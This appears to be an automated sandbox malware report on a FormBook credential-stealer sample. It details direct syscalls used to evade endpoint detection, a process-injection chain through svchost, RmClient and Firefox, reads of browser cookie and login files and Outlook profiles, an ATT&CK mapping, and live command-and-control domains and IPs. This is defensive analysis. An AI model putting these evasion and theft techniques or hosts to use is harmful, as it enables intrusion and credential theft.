                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03904940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0387096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03830887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038BC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0385E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_039008C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038FA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_038BC810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03852835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe  Code function: 0_2_005180A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe  Code function: 0_2_004EA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe  Code function: 0_2_004EA124 SetUnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtResumeThread: Direct from: 0x773836AC
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtMapViewOfSection: Direct from: 0x77382D1C
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtWriteVirtualMemory: Direct from: 0x77382E3C
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtProtectVirtualMemory: Direct from: 0x77382F9C
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtSetInformationThread: Direct from: 0x773763F9
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtCreateMutant: Direct from: 0x773835CC
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtNotifyChangeKey: Direct from: 0x77383C2C
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtSetInformationProcess: Direct from: 0x77382C5C
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtCreateUserProcess: Direct from: 0x7738371C
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtQueryInformationProcess: Direct from: 0x77382C26
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtResumeThread: Direct from: 0x77382FBC
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtWriteVirtualMemory: Direct from: 0x7738490C
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtAllocateVirtualMemory: Direct from: 0x77383C9C
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtReadFile: Direct from: 0x77382ADC
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtAllocateVirtualMemory: Direct from: 0x77382BFC
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtDelayExecution: Direct from: 0x77382DDC
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtQuerySystemInformation: Direct from: 0x77382DFC
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtOpenSection: Direct from: 0x77382E0C
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtQuerySystemInformation: Direct from: 0x773848CC
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtReadVirtualMemory: Direct from: 0x77382E8C
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtCreateKey: Direct from: 0x77382C6C
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtAllocateVirtualMemory: Direct from: 0x773848EC
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtQueryAttributesFile: Direct from: 0x77382E6C
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtSetInformationThread: Direct from: 0x77382B4C
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtTerminateThread: Direct from: 0x77382FCC
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtQueryInformationToken: Direct from: 0x77382CAC
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtOpenKeyEx: Direct from: 0x77382B9C
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtAllocateVirtualMemory: Direct from: 0x77382BEC
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtDeviceIoControlFile: Direct from: 0x77382AEC
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtCreateFile: Direct from: 0x77382FEC
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  NtOpenFile: Direct from: 0x77382DCC
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe  Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL target: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL target: C:\Windows\SysWOW64\RmClient.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\RmClient.exe  Section loaded: NULL target: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe protection: read write
                Source: C:\Windows\SysWOW64\RmClient.exe  Section loaded: NULL target: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\RmClient.exe  Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\RmClient.exe  Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\RmClient.exe  Thread register set: target process: 6528
                Source: C:\Windows\SysWOW64\RmClient.exe  Thread APC queued: target process: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe  Memory written: C:\Windows\SysWOW64\svchost.exe base: 2C38008
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe  Code function: 0_2_005187B1 LogonUserW
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe  Code function: 0_2_004C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe  Code function: 0_2_004C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe  Code function: 0_2_00524C53 mouse_event
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe  Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\9MZZG92yMO.exe"
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe  Process created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"
                Source: C:\Windows\SysWOW64\RmClient.exe  Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe  Code function: 0_2_00517CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe  Code function: 0_2_0051874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: 9MZZG92yMO.exe  Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: XBOIFKGKIWT.exe, 00000005.00000002.4011257873.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000005.00000000.2373107119.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2522876453.0000000000F20000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: IProgram Manager
                Source: 9MZZG92yMO.exe, XBOIFKGKIWT.exe, 00000005.00000002.4011257873.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000005.00000000.2373107119.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2522876453.0000000000F20000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Shell_TrayWnd
                Source: XBOIFKGKIWT.exe, 00000005.00000002.4011257873.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000005.00000000.2373107119.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2522876453.0000000000F20000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progman
                Source: XBOIFKGKIWT.exe, 00000005.00000002.4011257873.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000005.00000000.2373107119.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000000.2522876453.0000000000F20000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe  Code function: 0_2_004E862B cpuid
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe  Code function: 0_2_004F4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe  Code function: 0_2_00501E06 GetUserNameW
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe  Code function: 0_2_004F3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe  Code function: 0_2_004C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match  File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match  File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match  File source: 00000006.00000002.4010406938.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000006.00000002.4010091145.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000002.00000002.2453321754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000006.00000002.4010291438.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000005.00000002.4011798777.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000008.00000002.4014572631.0000000004C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000002.00000002.2454199303.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000002.00000002.2454931273.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\RmClient.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\RmClient.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\RmClient.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\RmClient.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\RmClient.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\RmClient.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\RmClient.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\RmClient.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\RmClient.exe  Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: 9MZZG92yMO.exe  Binary or memory string: WIN_81
                Source: 9MZZG92yMO.exe  Binary or memory string: WIN_XP
                Source: 9MZZG92yMO.exe  Binary or memory string: WIN_XPe
                Source: 9MZZG92yMO.exe  Binary or memory string: WIN_VISTA
                Source: 9MZZG92yMO.exe  Binary or memory string: WIN_7
                Source: 9MZZG92yMO.exe  Binary or memory string: WIN_8
                Source: 9MZZG92yMO.exe  Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                Source: Yara match  File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match  File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match  File source: 00000006.00000002.4010406938.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000006.00000002.4010091145.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000002.00000002.2453321754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000006.00000002.4010291438.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000005.00000002.4011798777.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000008.00000002.4014572631.0000000004C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000002.00000002.2454199303.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000002.00000002.2454931273.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe  Code function: 0_2_00536283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe  Code function: 0_2_00536747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                ATT&CK matrix, listed per tactic; the number in parentheses is the count of matching signatures, techniques without a number had no match:

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: Native API (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
                Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
                Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                Behavior Graph ID: 1588022  Sample: 9MZZG92yMO.exe  Startdate: 10/01/2025  Architecture: WINDOWS  Score: 100

                Graph nodes and edges recovered from the behavior graph:

                • Sample-level: www.winningpath.xyz; www.apptj7.xyz (Performs DNS queries to domains with low reputation); 15 other IPs or domains; Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 3 other signatures
                • 9MZZG92yMO.exe started: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
                • svchost.exe started by 9MZZG92yMO.exe: Maps a DLL or memory area into another process
                • XBOIFKGKIWT.exe injected by svchost.exe: Found direct / indirect Syscall (likely to bypass EDR)
                • RmClient.exe started by XBOIFKGKIWT.exe: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                • XBOIFKGKIWT.exe injected by RmClient.exe: www.winningpath.xyz 209.74.79.41 ports 49987, 49988, 49989 MULTIBAND-NEWHOPEUS United States; www.milp.store 194.9.94.86 ports 50000, 50001, 50002 LOOPIASE Sweden; 7 other IPs or domains; Found direct / indirect Syscall (likely to bypass EDR)
                • firefox.exe started by RmClient.exe

Source | Detection | Scanner | Label
9MZZG92yMO.exe | 54% | Virustotal |
9MZZG92yMO.exe | 66% | ReversingLabs | Win32.Trojan.AutoitInject
9MZZG92yMO.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://static.loopia.se/shared/logo/logo-loopia-white.svg | 0% | Avira URL Cloud | safe
https://static.loopia.se/responsive/images/iOS-72.png | 0% | Avira URL Cloud | safe
http://digi-searches.com/display.cfm | 0% | Avira URL Cloud | safe
http://www.did-ready.info/89qa/ | 0% | Avira URL Cloud | safe
http://digi-searches.com/Pieces.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HTjn | 0% | Avira URL Cloud | safe
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw | 0% | Avira URL Cloud | safe
http://www.deacapalla.online/__media__/design/underconstructionnotice.php?d=deacapalla.online | 0% | Avira URL Cloud | safe
http://digi-searches.com/September.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3H | 0% | Avira URL Cloud | safe
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking | 0% | Avira URL Cloud | safe
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe | 0% | Avira URL Cloud | safe
http://www.deacapalla.online/sdkp/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=Q2+U6NJof87KeL/xy+i0CIZPloZmzWZffj5EOQwXnkLhXENSPXaDW5SWGBVddIYwsB7Goe8a5E1AtdXY7h1Pcmgoj2AAtURgmOzcQSlReXoBGqrKsD90xFxRspg0pw2NsQGlTC8= | 0% | Avira URL Cloud | safe
http://www.winningpath.xyz/4p8s/ | 0% | Avira URL Cloud | safe
http://digi-searches.com/Ambrosia.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HT | 0% | Avira URL Cloud | safe
